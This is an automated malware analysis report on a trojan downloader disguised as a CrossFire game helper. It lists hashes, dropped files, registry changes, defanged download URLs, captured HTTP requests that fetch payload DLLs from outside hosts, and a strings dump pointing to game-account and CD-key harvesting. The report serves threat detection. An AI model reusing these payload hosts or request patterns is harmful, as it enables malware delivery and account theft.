Gen.Variant.Strictor.115846_ac088163cc

by malwarelabrobot on May 16th, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.AirJP.dx (Kaspersky), Gen:Variant.Strictor.115846 (B) (Emsisoft), Gen:Variant.Strictor.115846 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, PackedThemida.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan, Worm, EmailWorm, Packed


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: ac088163cc21f7fcd2ffe29a19681b9d
SHA1: 5187eb0eda83345f832ae9b5f999a08890507dbb
SHA256: de2be1821fb62984b6b0cf049c9c2f12e8d5bbb1deb58c05ca7e5eb4b7ff02e4
SSDeep: 24576:ZN7GLYkW0tsMCraUqwiWd9t2fTIqjZJrTENRDp9zNDS9rPZZJ6eoSWjhAUIS0eXI:2WraUfiWnSdZSV/DojkeoSWjC5iXFBU
Size: 1659392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Mail.Ru
Created at: 2017-04-14 17:10:16
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's notice and executes them.

Payload

Behaviour    Description
EmailWorm    Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

txservices.exe:760

The Trojan injects its code into the following process(es):

%original file name%.exe:4032
sesvcs_963_56089.exe:2324

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\txservices.exe (1638 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\26727603220161118442467[1].htm (92423 bytes)
C:\exdui.dll (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PRU52LTK.txt (90 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\baidu_com[1].htm (0 bytes)

The process txservices.exe:760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\23.txt (111347 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\NamuADLook[1].dll (17850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\33[1].txt (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\01[1].txt (102386 bytes)
%Program Files%\sesvcs_963_56089.exe (1815 bytes)
%Program Files%\NamuADLook.dll (21746 bytes)
C:\help.dll (202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G1K1JV5K.txt (112 bytes)

Registry activity

The process %original file name%.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "40 13 33 AA BE CD D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "40 13 33 AA BE CD D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process txservices.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "80 AD 33 B1 BE CD D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "80 AD 33 B1 BE CD D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
95a848da53e6ec6858692637d90ddcea c:\Program Files\NamuADLook.dll
0ebe4c4bf9b2c3aba1195d40d7330e5d c:\Program Files\sesvcs_963_56089.exe
95a848da53e6ec6858692637d90ddcea c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\NamuADLook[1].dll
0ebe4c4bf9b2c3aba1195d40d7330e5d c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\01[1].txt
c472335b008c5942ec8a162177058111 c:\exdui.dll
15a43a47885c3eff331e97137c08343d c:\help.dll
3a717af75626abe76c29c850915c8782 c:\txservices.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.1.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.1.0
File Description: CF????
Comments: www.cfzhushou.com
Language: English (United States)

PE Sections

Name     Virtual Address    Virtual Size    Raw Size    Entropy    Section MD5
UPX0     4096               3661824         0           0          d41d8cd98f00b204e9800998ecf8427e
UPX1     3665920            1630208         1628672     5.54507    56d18f5b8ab6c7ddae6ecbb3ca2d066a
.rsrc    5296128            32768           29696       3.80428    821d5df5c9a5a71659f005493551c053

URLs

URL IP
hxxp://www.a.shifen.com/
hxxp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/ 115.238.126.134
hxxp://download.verycdn.net/aload/as/33.txt
hxxp://xzdownad.zglhsw.com/adpub//01.txt 162.159.211.8
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll 162.159.211.8
hxxp://down.9udn.com/aload/as/33.txt 112.35.35.201
hxxp://www.baidu.com/
dns.msftncsi.com 131.107.255.255
teredo.ipv6.microsoft.com 157.56.120.207


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:27 GMT
Content-Type: text/plain
Content-Length: 2373334
Connection: keep-alive
Set-Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206; expires=Tue, 15-May-18 16:03:26 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Mon, 15 May 2017 05:53:11 GMT
Accept-Ranges: bytes
ETag: "6c9efe883fcdd21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f753ca74d16b49-WAW
....



GET /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:27 GMT
Content-Type: text/plain
Content-Length: 2373334
Connection: keep-alive
Last-Modified: Mon, 15 May 2017 05:53:11 GMT
Accept-Ranges: bytes
ETag: "6c9efe883fcdd21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f753ce47456b49-WAW

<<< skipped >>>

HEAD /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:40 GMT
Content-Type: application/x-msdownload
Content-Length: 373248
Connection: keep-alive
Last-Modified: Tue, 28 Feb 2017 15:41:16 GMT
Accept-Ranges: bytes
ETag: "0f6f718d991d21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f7541ea4a36b49-WAW
....



GET /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:40 GMT
Content-Type: application/x-msdownload
Content-Length: 373248
Connection: keep-alive
Last-Modified: Tue, 28 Feb 2017 15:41:16 GMT
Accept-Ranges: bytes
ETag: "0f6f718d991d21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f75422e73a6b49-WAW
<<< skipped >>>

GET /leesin_2017/blog/static/26727603220161118442467/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 May 2017 16:03:13 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=1F5EFEA3D1987BCB8CD052E67CA3275B.yqblog15-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hlkZ0UFaCnnZBRbTAg==; expires=Tue, 15-May-18 16:03:13 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

<<< skipped >>>

HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:14c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: s-maxage=60
Powered-By-VeryCDN: MISS from cmc-bj-1-3-c2321, MISS from utn-jy-2-2-c2391, MISS from utn-cz-1-1-c2391
Date: Mon, 15 May 2017 16:03:25 GMT
Age: 0
Connection: keep-alive
....



GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:14c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: s-maxage=60
Powered-By-VeryCDN: STALE from cmc-bj-1-3-c2321, HIT from utn-jy-2-2-c2391
Date: Mon, 15 May 2017 16:03:26 GMT
Age: 0
Connection: keep-alive

hXXp://xzdownad.zglhsw.com/adpub//01.txt


HEAD / HTTP/1.1
Accept: */*
Referer: hXXp://VVV.baidu.com/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: VVV.baidu.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: bfe/1.0.8.18
Date: Mon, 15 May 2017 16:03:11 GMT
Content-Type: text/html
Content-Length: 277
Last-Modified: Mon, 13 Jun 2016 02:50:23 GMT
Connection: Keep-Alive
ETag: "575e1f6f-115"
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Accept-Ranges: bytes


The Trojan connects to the servers at the following location(s):

%original file name%.exe_4032:

MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
02/24/16
V2.6.1
\CF_data.ini
hXXp://VVV.baidu.com/
hXXp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
help.dll
\help.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
D:\
01/04/17
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
pt_mbkey
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=8
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30827&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30827&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=8
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
